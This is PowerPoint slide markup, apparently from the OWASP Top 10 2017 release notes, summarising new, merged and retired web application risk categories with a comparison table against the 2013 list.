                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>A8:2017-Insecure Deserialization</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>A10:2017-Insufficient Logging and Monitoring</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>. Community feedback drove the collection of the most amount of data ever assembled in the preparation of an application security standard, and so we are confident that the remaining 8 issues are the most important for organizations to address, particularly the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>A3:2017-Sensitive Data Exposure</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> in the age of the EU's General Data Protection Regulation, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>A6:2017-Security Misconfiguration</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> especially around cloud and API services, and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>A9:2017-Using Components with Known Vulnerabilities</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>, which can be especially challenging for those on modern platforms, like node.js. </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The OWASP Top 10 for 2017 is based primarily on 40+ data submissions from firms that specialize in application security and an industry survey that was</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> completed by 515 individuals</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>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00" b="1" dirty="0">
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>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00" b="1"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2873660643"/>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lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>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772400">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>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Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>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panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Over the last decade, and in particularly these last few years, the fundamental architecture of applications has changed significantly:</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panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>JavaScript is now the primary language of the web. node.js and modern web frameworks such as Bootstrap, Electron, Angular, React amongst many others, means source that was once on the server is now running on untrusted browsers. </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Single page applications, written in JavaScript frameworks such as Angular and React, allow the creation of highly modular front end user experiences, not to mention the rise and rise of mobile apps using the same APIs as single page applications.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800" algn="l">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Microservices written in node.js and Spring Boot are replacing older enterprise service bus applications using EJBs and so on. Old code that never expected to be communicated with directly from the Internet is now sitting behind an API or RESTful web service. The assumptions that underlie this code, such as trusted callers, are simply not valid.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>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data</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A4:2017-XML External Entity (XXE) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>is a new category primarily supported by SAST data sets. </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New issues, supported by the community</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>We asked the community to provide insight into two forward looking weakness categories. After 516 peer submissions, and  removing issues that were already supported by data (such as Sensitive Data Exposure and XXE), the two new issues are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A8:2017-Insecure Deserialization</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, responsible for one of the worst breaches of all time, and</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A10:2017-Insufficient Logging and Monitoring</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, the lack of which can prevent or significantly delay malicious activity and breach detection, incident response and digital forensics.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Retired, but not forgotten</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panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A4 Insecure direct object references </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A7 Missing function level access control </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>merged into </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A5:2017-Broken Access Control</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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A8 CSRF. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Less than 5% of the data set supports CSRF today, which places it around #13 </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800" algn="l">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>A10 Unvalidated redirects and forwards</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>. Less than 1% of the data set supports this issue today, as it’s now #25</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Aria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72"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2847296264"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="5364480"/>
          <a:ext cx="6858000" cy="377952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81835">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3229063">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rPr>
                        <a:t>OWASP Top 10 2013</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3C752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D9EAD5"/>
                          </a:solidFill>
                          <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                          <a:ea typeface="OpenSymbol"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:sym typeface="Wingdings"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="D9EAD5"/>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bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OWASP Top 10 2017</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>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A1647"/>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 – Injection</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="4E8542"/>
                        </a:solidFill>
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A1:2017-Injection</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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 – Broken Authentication and Session Management</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A2:2017-Broken Authentication </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 – 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A3:2017-Sensitive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 – Insecure Direct Object References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Merged+A7]</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chemeClr val="accent4"/>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A4:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>XML External Entity (XXE) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[NEW]</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 – Security Misconfiguration</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A5:2017-Broken Access Control [Merged]</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 – Sensitive Data Exposure</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Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>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A6:2017-Security Misconfiguration</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="accent3"/>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A7</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Missing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Function</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Level</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Access</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latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Contr </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Merged+A4]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="4E8542"/>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chemeClr val="accent4"/>
                          </a:solidFill>
                          <a:latin typeface="Wide Latin" panose="020A0A07050505020404" pitchFamily="18" charset="0"/>
                          <a:ea typeface="OpenSymbol"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>∪</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="00206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A7</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Cross-Site Scripting (XSS)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 – Cross-Site Request Forgery (CSRF)</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A8:2017-Insecure Deserialization </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[NEW, Community]</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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A9 – 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4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                          <a:ea typeface="OpenSymbol"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:sym typeface="Wingdings"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>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A9:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Using Components with Known Vulnerabilities</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 – Unvalidated Redirects and Forwards</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="C00000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Arial"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C00000"/>
                          </a:solidFill>
                          <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                          <a:ea typeface="OpenSymbol"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:sym typeface="Wingdings"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="C00000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Arial"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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A10:2017-Insufficient</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Logging</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&amp;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Monitoring</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>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[NEW,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Comm.]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRP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a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Release Notes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
